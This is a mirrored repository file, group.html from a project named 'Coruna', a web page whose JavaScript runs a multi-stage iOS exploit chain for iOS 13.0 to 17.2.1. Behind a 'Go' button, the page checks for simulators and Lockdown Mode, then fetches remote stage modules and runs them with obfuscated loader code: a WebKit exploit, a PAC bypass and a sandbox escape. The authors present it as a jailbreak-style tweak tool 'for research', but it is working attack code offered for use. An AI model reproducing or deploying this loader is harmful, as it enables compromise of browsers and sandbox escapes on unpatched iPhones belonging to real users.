CalvinBackup/coruna
1
0
Fork 0
mirror of https://github.com/khanhduytran0/coruna.git synced 2026-04-23 20:26:14 +02:00
Code Issues Packages Projects Releases Wiki Activity
Files
duy/decompile
coruna/group.html
T
Huy Nguyen c9b20b8d41 a branch for the springboard tweak
2026-03-12 05:42:32 +07:00

699 lines
27 KiB
HTML
Raw Permalink Blame History

<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" />
<meta property="og:determiner" content="auto" />
<title>Coruna</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'SF Pro Text', 'Helvetica Neue', sans-serif;
background: #000;
color: #fff;
min-height: 100vh;
display: flex;
flex-direction: column;
align-items: center;
overflow-x: hidden;
-webkit-user-select: none;
user-select: none;
}
.container {
width: 100%;
max-width: 420px;
padding: 20px;
display: flex;
flex-direction: column;
align-items: center;
}
.logo {
margin-top: 60px;
font-size: 42px;
font-weight: 700;
letter-spacing: -1px;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.subtitle {
font-size: 14px;
color: #666;
margin-top: 6px;
letter-spacing: 2px;
text-transform: uppercase;
}
.status-card {
margin-top: 30px;
width: 100%;
background: #111;
border-radius: 16px;
padding: 20px;
border: 1px solid #222;
}
.status-header {
display: flex;
align-items: center;
gap: 10px;
margin-bottom: 14px;
}
.status-dot {
width: 10px;
height: 10px;
border-radius: 50%;
background: #333;
transition: background 0.3s;
}
.status-dot.waiting { background: #555; }
.status-dot.running { background: #f0ad4e; animation: pulse 1.2s infinite; }
.status-dot.success { background: #5cb85c; }
.status-dot.error { background: #d9534f; }
@keyframes pulse {
0%, 100% { opacity: 1; }
50% { opacity: 0.4; }
}
.status-text {
font-size: 15px;
font-weight: 600;
}
.log-area {
width: 100%;
max-height: 180px;
overflow-y: auto;
font-family: 'SF Mono', 'Menlo', monospace;
font-size: 11px;
color: #888;
line-height: 1.6;
scrollbar-width: none;
}
.log-area::-webkit-scrollbar { display: none; }
.log-line {
padding: 1px 0;
word-break: break-all;
}
.log-line.highlight { color: #667eea; }
.log-line.error { color: #d9534f; }
.log-line.success { color: #5cb85c; }
.go-btn {
margin-top: 24px;
width: 100%;
padding: 16px;
border: none;
border-radius: 14px;
font-size: 17px;
font-weight: 600;
color: #fff;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
cursor: pointer;
transition: opacity 0.2s, transform 0.1s;
-webkit-tap-highlight-color: transparent;
}
.go-btn:active { transform: scale(0.97); }
.go-btn:disabled { opacity: 0.4; cursor: not-allowed; transform: none; }
.progress-bar {
margin-top: 16px;
width: 100%;
height: 4px;
background: #222;
border-radius: 2px;
overflow: hidden;
opacity: 0;
transition: opacity 0.3s;
}
.progress-bar.active { opacity: 1; }
.progress-fill {
height: 100%;
width: 0%;
background: linear-gradient(90deg, #667eea, #764ba2);
border-radius: 2px;
transition: width 0.4s ease;
}
.divider {
margin-top: 32px;
width: 40px;
height: 2px;
background: #222;
border-radius: 1px;
}
.credits-section {
margin-top: 28px;
width: 100%;
}
.credits-title {
font-size: 13px;
font-weight: 600;
color: #444;
text-transform: uppercase;
letter-spacing: 1.5px;
margin-bottom: 12px;
text-align: center;
}
.credits-grid {
display: flex;
flex-wrap: wrap;
justify-content: center;
gap: 8px;
}
.credit-tag {
padding: 6px 14px;
background: #111;
border: 1px solid #222;
border-radius: 20px;
font-size: 13px;
color: #999;
text-decoration: none;
transition: border-color 0.2s, color 0.2s;
}
.credit-tag:active { border-color: #444; color: #ccc; }
.made-by {
margin-top: 28px;
width: 100%;
text-align: center;
}
.made-by-title {
font-size: 13px;
font-weight: 600;
color: #444;
text-transform: uppercase;
letter-spacing: 1.5px;
margin-bottom: 12px;
}
.made-by-names {
display: flex;
flex-wrap: wrap;
justify-content: center;
gap: 8px;
}
.made-by-tag {
padding: 6px 14px;
background: linear-gradient(135deg, rgba(102,126,234,0.15), rgba(118,75,162,0.15));
border: 1px solid rgba(102,126,234,0.3);
border-radius: 20px;
font-size: 13px;
color: #a8b4f0;
font-weight: 500;
text-decoration: none;
}
.made-by-tag:active { border-color: rgba(102,126,234,0.6); color: #c8d0f8; }
.version-warning {
display: none;
margin-top: 20px;
width: 100%;
background: rgba(217, 83, 79, 0.1);
border: 1px solid rgba(217, 83, 79, 0.3);
border-radius: 12px;
padding: 14px 16px;
font-size: 13px;
color: #e88;
line-height: 1.5;
text-align: center;
}
.version-warning.show { display: block; }
.footer {
margin-top: 32px;
margin-bottom: 40px;
text-align: center;
font-size: 11px;
color: #333;
line-height: 1.6;
}
</style>
</head>
<body>
<div class="container">
<div class="logo">Coruna</div>
<div class="subtitle">iOS 13.0 &ndash; 17.2.1</div>
<div class="version-warning" id="versionWarning">
Your iOS version is higher than 17.2.1. The exploit will not work on your device, but you can still view the page.
</div>
<div class="status-card">
<div class="status-header">
<div class="status-dot waiting" id="statusDot"></div>
<div class="status-text" id="statusText">Ready</div>
</div>
<div class="log-area" id="logArea"></div>
</div>
<div class="progress-bar" id="progressBar">
<div class="progress-fill" id="progressFill"></div>
</div>
<button class="go-btn" id="goBtn" onclick="startExploit()">Go</button>
<div class="divider"></div>
<div class="made-by">
<div class="made-by-title">Made by</div>
<div class="made-by-names">
<a class="made-by-tag" href="https://github.com/34306" target="_blank">34306</a>
<a class="made-by-tag" href="https://github.com/khanhduytran0" target="_blank">Duy Tran</a>
<a class="made-by-tag" href="https://github.com/asdfugil" target="_blank">Nick Chan</a>
</div>
</div>
<div class="credits-section">
<div class="credits-title">Thanks to</div>
<div class="credits-grid">
<a class="credit-tag" href="https://github.com/wh1te4ever/" target="_blank">wh1te4ever</a>
<a class="credit-tag" href="https://github.com/alfiecg24" target="_blank">Alfie</a>
<span class="credit-tag">Clarity</span>
<a class="credit-tag" href="https://www.youtube.com/c/BillyEllis" target="_blank">Billy Ellis</a>
<a class="credit-tag" href="https://github.com/matteyeux/" target="_blank">matteyeux</a>
<a class="credit-tag" href="https://github.com/verygenericname/" target="_blank">Nathan</a>
<span class="credit-tag">helthydriver</span>
<a class="credit-tag" href="https://github.com/staturnzz" target="_blank">saturnz</a>
<a class="credit-tag" href="https://github.com/opa334" target="_blank">opa334</a>
<a class="credit-tag" href="https://github.com/hrtowii" target="_blank">hrtowii</a>
<a class="credit-tag" href="https://github.com/dlevi309" target="_blank">daniel</a>
</div>
</div>
<div class="footer">
Vibe coded web site UI, for fun and research only :P
</div>
</div>
<script src="platform_module.js"></script>
<script src="utility_module.js"></script>
<script type="text/javascript">
// ============================================================================
// UI Helpers
// ============================================================================
// Check iOS version and show warning if > 17.2.1
(function() {
var ua = navigator.userAgent;
var match = ua.match(/OS (\d+)_(\d+)(?:_(\d+))? /);
if (match) {
var major = parseInt(match[1], 10);
var minor = parseInt(match[2], 10);
var patch = match[3] ? parseInt(match[3], 10) : 0;
// Higher than 17.2.1
if (major > 17 || (major === 17 && minor > 2) || (major === 17 && minor === 2 && patch > 1)) {
document.getElementById('versionWarning').classList.add('show');
}
} else if (!/iPhone|iPad|iPod/.test(ua)) {
// Not an iOS device at all - show warning
document.getElementById('versionWarning').classList.add('show');
document.getElementById('versionWarning').textContent = 'This tool is designed for iOS 13.0 \u2013 17.2.1 devices only. You can still view the page.';
}
})();
var exploitStarted = false;
var progressValue = 0;
function setStatus(text, state) {
document.getElementById('statusText').textContent = text;
var dot = document.getElementById('statusDot');
dot.className = 'status-dot ' + state;
}
function setProgress(pct) {
progressValue = pct;
document.getElementById('progressFill').style.width = pct + '%';
}
window.log = function(text) {
var area = document.getElementById('logArea');
var line = document.createElement('div');
line.className = 'log-line';
if (text.indexOf('error') !== -1 || text.indexOf('Error') !== -1 || text.indexOf('ABORT') !== -1 || text.indexOf('FAILED') !== -1) {
line.className += ' error';
} else if (text.indexOf('complete') !== -1 || text.indexOf('succeeded') !== -1 || text.indexOf('success') !== -1 || text.indexOf('active') !== -1) {
line.className += ' success';
} else if (text.indexOf('Loading') !== -1 || text.indexOf('starting') !== -1 || text.indexOf('Selecting') !== -1) {
line.className += ' highlight';
}
line.textContent = text;
area.appendChild(line);
area.scrollTop = area.scrollHeight;
};
window.addDownloadBinary = function(fileName, text) {
var fileType = "application/octet-stream";
var blob = new Blob([text], { type: fileType });
var a = document.createElement('a');
a.download = fileName;
a.href = URL.createObjectURL(blob);
a.dataset.downloadurl = [fileType, a.download, a.href].join(':');
a.text = "Download " + fileName;
document.body.appendChild(a);
};
// ============================================================================
// Module Loader (unchanged logic)
// ============================================================================
function fqMaGkNL(W) {
W = W.toString(16).toLowerCase();
return 1 === W.length && (W = "0" + W), W
}
function fqMaGkN4(arr) {
let out = "";
for (const q of arr) {
const b0 = q & 0xFF;
const b1 = (q >> 8) & 0xFF;
const b2 = (q >> 16) & 0xFF;
const b3 = (q >> 24) & 0xFF;
out += String.fromCharCode((b1 << 8) | b0);
out += String.fromCharCode((b3 << 8) | b2);
}
return out;
}
function fqMaGkNg() {
return fqMaGkN4([1631006510, 960062519, 1647917360, 1647653680, 892756786, 912405041, 1701143141, 1681285477, 1684353382, 1714435941, 1831756386, 1781427817, 115])
}
window.globalThis = window;
globalThis.moduleManager = (function () {
let MM = {
"57620206d62079baad0e57e6d9ec93120c0f5247": m_57620206d62079baad0e57e6d9ec93120c0f5247,
"14669ca3b1519ba2a8f40be287f646d4d7593eb0": m_14669ca3b1519ba2a8f40be287f646d4d7593eb0,
};
const e = { "$": "", "p": "" };
function sha256(M) {
let I = "";
function N(M, I) { return M >>> I | M << 32 - I }
const D = Math.pow, g = D(2, 32),
T = ([89, 80, 91, 82, 65, 93].map(x => String.fromCharCode(x ^ 53)).join(""));
let c, d;
const L = [], b = 8 * M[T];
let i = sha256.h = sha256.h || [];
const y = sha256.k = sha256.k || [];
let C = y[T];
const X = {};
for (let M = 2; C < 64; M++)
if (!X[M]) {
for (c = 0; c < (1499680357 ^ 1499680604); c += M) X[c] = M;
i[C] = D(M, .5) * g | 0, y[C++] = D(M, 1 / 3) * g | 0
}
for (M += "\x80"; M[T] % 64 - 56;) M += "\0";
for (c = 0; c < M[T]; c++) {
if (d = M.charCodeAt(c), d >> 8) return;
L[c >> 2] |= d << (3 - c) % 4 * 8
}
for (L[L[T]] = b / g | 0, L[L[T]] = b, d = 0; d < L[T];) {
const M = L.slice(d, d += 16), I = i;
for (i = i.slice(0, 8), c = 0; c < 64; c++) {
const I = M[c - 15], D = M[c - 2], g = i[0], T = i[4],
d = i[7] + (N(T, 6) ^ N(T, 11) ^ N(T, 25)) + (T & i[5] ^ ~T & i[6]) + y[c] + (M[c] = c < 16 ? M[c] : M[c - 16] + (N(I, 7) ^ N(I, 18) ^ I >>> 3) + M[c - 7] + (N(D, 17) ^ N(D, 19) ^ D >>> 10) | 0);
i = [d + ((N(g, 2) ^ N(g, 13) ^ N(g, 22)) + (g & i[1] ^ g & i[2] ^ i[1] & i[2])) | 0].concat(i), i[4] = i[4] + d | 0
}
for (c = 0; c < 8; c++) i[c] = i[c] + I[c] | 0
}
for (c = 0; c < 8; c++)
for (d = 3; d + 1; d--) {
const M = i[c] >> 8 * d & (1433892436 ^ 1433892523);
I += (M < 16 ? 0 : "") + M.toString(16)
}
return I
}
function c(M) {
if (M in e == !1) {
if (M in MM != !0) throw new Error("M in MM != !0");
window.log("Load " + M);
e[M] = MM[M]();
}
return e[M]
}
return {
hPL3On: this.getModuleByName,
ZKvD0e: this.getModuleByURL,
fgPoij: this.evalBase64Module,
setBaseUrl: function (M) { e.$ = M },
setSalt: function (M) { e.p = M },
getModuleByName: c,
getModuleByURL: async function (moduleId) {
window.log("[LOADER] Loading module: " + moduleId + "...");
if (moduleId in e == !1 && moduleId in MM == !1) {
let I = moduleId;
I = moduleId;
const N = await async function (M) {
window.log("Loading " + M);
return new Promise(((I, N) => {
const D = new XMLHttpRequest;
let g;
const T = (M, I) => Math.floor(Math.random() * (I - M + 1)) + M;
g = new URL((e.$) + (M));
const c = Math.random().toString(36).slice(2, T(5, 10)), d = T(0, 1);
g.searchParams.set(c, d),
D.open("GET", g.toString(), !0),
D.responseType = ([66, 83, 78, 66].map(x => String.fromCharCode(x ^ 54)).join("")),
D.onreadystatechange = () => {
if (D.readyState === XMLHttpRequest.DONE)
if (200 === D.status) {
const M = D.response;
null === M || "" === M ? reject("") : I(M)
} else reject("")
},
D.send()
}))
}((I) + ".js");
e[moduleId] = new Function(N)()
}
return c(moduleId)
},
evalCode: function (M, I) { M in e == !1 && (e[M] = I()) },
evalBase64Module: function (M, I) { M in e == !1 && (e[M] = new Function(atob(I))()) },
};
})();
globalThis.obChTK = globalThis.moduleManager;
const utilityModule = globalThis.moduleManager.getModuleByName("57620206d62079baad0e57e6d9ec93120c0f5247"),
platformModule = globalThis.moduleManager.getModuleByName("14669ca3b1519ba2a8f40be287f646d4d7593eb0");
let baseUrl = window.location.origin + window.location.pathname.slice(0, window.location.pathname.lastIndexOf("/") + 1);
globalThis.moduleManager.setBaseUrl(baseUrl);
globalThis.moduleManager.setSalt("cecd08aa6ff548c2");
// Telemetry removed
function fqMaGkNr(W) { }
// ============================================================================
// PAC Bypass Loader
// ============================================================================
async function loadPACBypass() {
window.log("[PAC] Selecting PAC bypass variant...");
setProgress(50);
const offsets = globalThis.moduleManager.getModuleByName(
"14669ca3b1519ba2a8f40be287f646d4d7593eb0"
).platformState.versionFlags;
if (offsets.wF8NpI) {
await (await globalThis.moduleManager.getModuleByURL("Stage2_16.6_17.2.1_seedbell_pre")).ul();
pacModule = await globalThis.moduleManager.getModuleByURL("Stage2_17.0_17.2.1_seedbell");
} else if (offsets.LJ1EuL) {
await (await globalThis.moduleManager.getModuleByURL("Stage2_16.6_17.2.1_seedbell_pre")).ul();
pacModule = await globalThis.moduleManager.getModuleByURL("Stage2_16.6_16.7.12_seedbell");
} else if (offsets.CpDW_T) {
pacModule = await globalThis.moduleManager.getModuleByURL("Stage2_16.3_16.5.1_seedbell");
} else if (offsets.IqxL92) {
pacModule = await globalThis.moduleManager.getModuleByURL("Stage2_15.0_16.2_breezy15");
} else {
pacModule = await globalThis.moduleManager.getModuleByURL("Stage2_13.0_14.x_breezy");
}
if (void 0 === pacModule) throw Error("");
setProgress(60);
return pacModule.ga();
}
// ============================================================================
// Main Exploit
// ============================================================================
async function triggerExploit() {
var platform = navigator.platform;
const userAgent = navigator.userAgent;
setStatus("Initializing...", "running");
setProgress(5);
window.log("[LOADER] === Exploit chain starting ===");
window.log("[LOADER] Platform: " + platform);
if (await platformModule.init("", fqMaGkNg(), "", Array(!1)[0], Array(!1)[0], platform, userAgent), platformModule.On()) throw Error("");
window.log("[PLATFORM] iOS version: " + platformModule.platformState.iOSVersion);
setProgress(10);
if (13E4 > platformModule.platformState.iOSVersion) {
setStatus("Unsupported version", "error");
return 1001;
}
if (16E4 <= platformModule.platformState.iOSVersion) {
try { await platformModule.Hn(); } catch (p) { setStatus("Simulator check failed", "error"); return 1001 }
if (platformModule.platformState.Qn) { setStatus("Simulator detected", "error"); return 1003; }
}
try { await platformModule.Yn(); } catch (e) { setStatus("Lockdown mode", "error"); return 1001; }
setProgress(15);
// Stage 1
let stage1Module;
const offsets = platformModule.platformState.versionFlags;
setStatus("Stage 1: WebKit exploit...", "running");
window.log("[LOADER] Selecting stage1 variant...");
if (offsets.JtEUci) {
stage1Module = await globalThis.moduleManager.getModuleByURL("Stage1_16.6_17.2.1_cassowary");
} else if (offsets.KeCRDQ) {
stage1Module = await globalThis.moduleManager.getModuleByURL("Stage1_16.2_16.5.1_terrorbird");
} else if (offsets.ShQCsB) {
stage1Module = await globalThis.moduleManager.getModuleByURL("Stage1_15.6_16.1.2_bluebird");
} else if (offsets.RbKS6p) {
stage1Module = await globalThis.moduleManager.getModuleByURL("Stage1_15.2_15.5_jacurutu");
} else if (offsets.mmrZ0r) {
stage1Module = await globalThis.moduleManager.getModuleByURL("7d8f5bae97f37aa318bccd652bf0c1dc38fd8396");
}
if (void 0 === stage1Module) { setStatus("No exploit for this version", "error"); return 1001; }
setProgress(20);
await (async function executeStage1() {
for (let attempt = 0; attempt < 20; attempt++) {
try {
window.log("[LOADER] Stage1 attempt " + (attempt + 1) + "/20...");
setProgress(20 + Math.min(attempt * 1.5, 15));
if ("AsyncFunction" === stage1Module.si.constructor.name) {
await stage1Module.si();
} else {
stage1Module.si();
}
window.log("[LOADER] Stage1 succeeded on attempt " + (attempt + 1));
return;
} catch (e) {
window.log("[LOADER] Error:" + e.name + ": " + e.message);
}
}
throw Error("");
})();
if (!platformModule.platformState.exploitPrimitive) throw Error("");
setProgress(40);
setStatus("Stage 2: PAC bypass...", "running");
// Stage 2 + 3
platform = 0;
try {
platformModule.lr();
window.log("[RUNTIME] PAC=" + platformModule.platformState.hasPAC);
if (platformModule.platformState.hasPAC) {
platformModule.platformState.pacBypass = await loadPACBypass();
platformModule.platformState.qn = await platformModule.$n();
}
setProgress(70);
setStatus("Stage 3: Sandbox escape...", "running");
if (true === offsets.wC3yaB && true === platformModule.platformState.qn) {
window.log("[STAGE3] Loading variant A...");
platform = await (await globalThis.moduleManager.getModuleByURL("Stage3_VariantA")).lA();
} else {
window.log("[STAGE3] Loading variant B...");
platform = await (await globalThis.moduleManager.getModuleByURL("Stage3_VariantB")).lA();
}
setProgress(95);
window.log("[STAGE3] Result: " + platform);
} catch (error) {
window.log("[LOADER] Error:" + error.name + ": " + error.message);
platform = 1000;
throw error;
} finally {
if (platformModule.platformState.exploitPrimitive) {
platformModule.platformState.exploitPrimitive.cleanup();
}
}
setProgress(100);
return platform;
}
// ============================================================================
// Start Button
// ============================================================================
async function startExploit() {
if (exploitStarted) return;
exploitStarted = true;
var btn = document.getElementById('goBtn');
btn.disabled = true;
btn.textContent = 'Running...';
document.getElementById('progressBar').classList.add('active');
setProgress(0);
try {
const result = await triggerExploit();
if (result === 0) {
setStatus("Success! Tweaks injected", "success");
setProgress(100);
btn.textContent = 'Done';
} else if (result === 1001) {
btn.textContent = 'Unsupported';
} else if (result === 1003) {
btn.textContent = 'Simulator';
} else {
setStatus("Finished (code: " + result + ")", "success");
setProgress(100);
btn.textContent = 'Done';
}
} catch (e) {
setStatus("Failed: " + (e.message || "unknown error"), "error");
btn.textContent = 'Retry';
btn.disabled = false;
exploitStarted = false;
}
}
</script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink